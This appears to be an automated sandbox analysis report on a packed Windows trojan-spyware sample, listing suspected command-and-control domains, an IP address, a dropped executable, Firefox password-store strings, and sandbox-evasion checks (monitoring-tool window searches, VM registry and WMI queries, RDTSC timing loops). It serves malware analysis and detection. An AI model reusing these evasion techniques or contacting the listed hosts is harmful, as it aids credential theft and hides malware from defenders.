Source: random.exe, 00000000.00000002.1537110797.0000000005CF3000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031585278.000000000154C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.955963145.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live/
Source: random.exe, 00000000.00000003.1031386733.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live/gsopp
Source: random.exe, 00000000.00000003.1532191574.0000000001548000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031585278.000000000154C000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1535170189.0000000001552000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1031386733.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live/gsoppQ%
Source: random.exe, 00000000.00000003.955963145.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live/gsopphW
Source: random.exe, 00000000.00000003.1014880251.000000000153A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live/gsoppyW
Source: random.exe, 00000000.00000003.955963145.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live:443/gsoppR
Source: random.exe, 00000000.00000002.1534936154.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://oreheatq.live:443/gsoppocal
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: random.exe, 00000000.00000003.959697086.0000000005D66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: random.exe, 00000000.00000003.990124406.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: random.exe, 00000000.00000003.981842615.0000000005E15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: random.exe, 00000000.00000003.955963145.00000000014C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wxayfarer.live:443/ALosnzsU

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443

Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.172.183:443 -> 192.168.2.7:49687 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name:
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: .idata
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name:

Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr

Static PE information: Data appended to the last section found

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random.exe	Static PE information: Section: ZLIB complexity 0.9984714673913043
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983481835399449
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: Section: vyhhgzxi ZLIB complexity 0.9952657000804331

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/1@3/2

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user~1\AppData\Local\Temp\W2U54XWUYRFYVUMBYUAR0TMO04229I.exe

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: random.exe, 00000000.00000003.959697086.0000000005D28000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.970686924.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.959398399.0000000005D53000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.970939961.0000000005D0C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: random.exe	Virustotal: Detection: 56%
Source: random.exe	ReversingLabs: Detection: 58%

Source: random.exe

String found in binary or memory: &/adD

Source: C:\Users\user\Desktop\random.exe

File read: C:\Users\user\Desktop\random.exe

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: random.exe

Static file information: File size 3014144 > 1048576

Source: random.exe

Static PE information: Raw size of ykkdiuif is bigger than: 0x100000 < 0x2ae200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\random.exe

Unpacked PE file: 0.2.random.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W;ykkdiuif:EW;ppaughip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ykkdiuif:EW;ppaughip:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: real checksum: 0x1d5d21 should be: 0xa67d0
Source: random.exe	Static PE information: real checksum: 0x2e5ff3 should be: 0x2ed7fe

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name: ykkdiuif
Source: random.exe	Static PE information: section name: ppaughip
Source: random.exe	Static PE information: section name: .taggant
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name:
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: .idata
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name:
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: vyhhgzxi
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: okzpskpe
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0153C6D2 pushad ; retf	0_3_0153C799
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0153C6D2 pushad ; retf	0_3_0153C799
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01561625 push eax; iretd	0_3_01561626
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01561625 push eax; iretd	0_3_01561626
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01506D4D push eax; iretd	0_3_01506D4E
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01502661 push eax; iretd	0_3_01502662
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01502725 push eax; iretd	0_3_01502726
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01561625 push eax; iretd	0_3_01561626
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_01561625 push eax; iretd	0_3_01561626
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0153C6D2 pushad ; retf	0_3_0153C799
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0153C6D2 pushad ; retf	0_3_0153C799
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0153C6D2 pushad ; retf	0_3_0153C799
Source: C:\Users\user\Desktop\random.exe	Code function: 0_3_0153C6D2 pushad ; retf	0_3_0153C799

Source: random.exe	Static PE information: section name: entropy: 7.976556552628717
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: entropy: 7.974981044395583
Source: W2U54XWUYRFYVUMBYUAR0TMO04229I.exe.0.dr	Static PE information: section name: vyhhgzxi entropy: 7.92131920585007

Source: C:\Users\user\Desktop\random.exe

File created: C:\Users\user\AppData\Local\Temp\W2U54XWUYRFYVUMBYUAR0TMO04229I.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\random.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\random.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040E59 second address: 1040E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040E5D second address: 1040E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040E61 second address: 1040E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F980CD044E9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040E80 second address: 1040E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CCD2256h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040E9A second address: 1040E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040E9E second address: 1040EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040038 second address: 1040064 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F980CD044D6h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F980CD044E1h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040064 second address: 104007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD224Dh 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104007B second address: 1040081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040309 second address: 1040314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1040314 second address: 104031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104031A second address: 1040327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F980CCD2248h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10405C5 second address: 1040613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F980CD044E8h 0x00000012 jmp 00007F980CD044DEh 0x00000017 jmp 00007F980CD044E3h 0x0000001c jnc 00007F980CD044DEh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1044344 second address: 1044391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jl 00007F980CCD2254h 0x0000000f pushad 0x00000010 js 00007F980CCD2246h 0x00000016 jbe 00007F980CCD2246h 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push edi 0x00000022 pushad 0x00000023 jmp 00007F980CCD224Eh 0x00000028 push eax 0x00000029 pop eax 0x0000002a popad 0x0000002b pop edi 0x0000002c mov eax, dword ptr [eax] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007F980CCD2251h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1044391 second address: 1044396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10444F5 second address: 10444F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10444F9 second address: 104450A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104450A second address: 1044514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F980CCD2246h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1044514 second address: 104453E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F980CD044D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F980CD044E8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 104453E second address: 1044557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CCD2255h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10446D2 second address: 10446D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10622FB second address: 1062301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062301 second address: 1062306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10625B6 second address: 10625BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10625BD second address: 10625E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jmp 00007F980CD044E9h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10625E2 second address: 10625EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062725 second address: 1062759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E6h 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F980CD044E2h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062759 second address: 106275F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106275F second address: 1062775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F980CD044D6h 0x0000000a jno 00007F980CD044D6h 0x00000010 popad 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062A23 second address: 1062A38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F980CCD2246h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d js 00007F980CCD2246h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062A38 second address: 1062A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jmp 00007F980CD044E7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062BE6 second address: 1062BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F980CCD224Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1062E77 second address: 1062E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10632CD second address: 10632E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F980CCD2246h 0x0000000a popad 0x0000000b jg 00007F980CCD224Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10632E0 second address: 10632EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10632EA second address: 1063303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD2255h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1059308 second address: 1059323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F980CD044D6h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1059323 second address: 105932E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 105932E second address: 1059336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
